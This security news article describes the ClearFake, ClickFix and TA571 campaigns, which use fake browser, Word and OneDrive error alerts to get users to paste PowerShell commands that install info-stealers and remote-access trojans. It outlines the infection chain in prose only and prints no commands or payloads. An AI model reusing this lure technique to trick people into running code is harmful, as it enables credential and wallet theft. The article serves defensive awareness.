Security experts have uncovered a novel malware operation that leverages deceptive error alerts from Google Chrome, Microsoft Word, and OneDrive to persuade users to execute malicious PowerShell scripts. This operation involves multiple threat groups, including those behind ClearFake, ClickFix, and TA571, all known for disseminating extensive spam emails that usually culminate in malware or ransomware attacks.
Advanced Social Engineering Techniques
The threat actors employ JavaScript within HTML attachments and hijacked websites to generate fake error notifications. These alerts prompt users to copy a PowerShell “fix” command and execute it in a PowerShell prompt or using the Run dialog. The script flushes the DNS cache, clears clipboard data, displays a decoy message, and downloads another PowerShell script with anti-VM checks before fetching an info-stealer.
Proofpoint, a cybersecurity organization, notes that despite requiring significant user action, the attackers' social engineering methods are sophisticated enough to convince users they are resolving legitimate issues.
ClearFake Campaign
Since April, the ClearFake operation has been hijacking authentic websites with harmful HTML and JavaScript. Victims visiting these sites are prompted to install a “root certificate” to properly view the website. They are instructed to copy a PowerShell script and manually run it on their systems.
The script performs several actions, such as flushing the DNS cache, erasing clipboard data, showing a decoy message, and downloading a remote PowerShell script. This script runs additional commands, including fetching an AES-encrypted PowerShell script that extracts and runs files from a ZIP archive. The ZIP archive hosts various legitimate executable files that side-load a trojanized DLL, subsequently activating Lumma Stealer.
ClickFix Campaign
Mid-April saw the ClickFix operation using compromised websites to display an iframe with a bogus alert about a browser update problem. Users were directed to open “Windows PowerShell (Admin)” and paste a provided code, executing a remote PowerShell script that fetched and ran Vidar Stealer, a malware that targets personal information and cryptocurrency wallet data within the compromised environment. The domain serving the payload was taken offline shortly after discovery, disrupting the campaign temporarily.
TA571 Campaign
TA571 was first observed utilizing this approach on 1 March 2024, sending over 100,000 messages to multiple organizations. The campaign used HTML attachments mimicking Microsoft Word documents, with error prompts urging users to execute PowerShell commands, leading to the installation of malware such as DarkGate and Matanbuchus.
On 27 May 2024, TA571 used HTML attachments mimicking OneDrive-hosted documents, directing users to execute PowerShell scripts, thereby installing DarkGate malware. The group has also been seen using the Run dialog instead of the PowerShell terminal, guiding users to run malicious scripts resulting in infections with DarkGate and NetSupport RAT.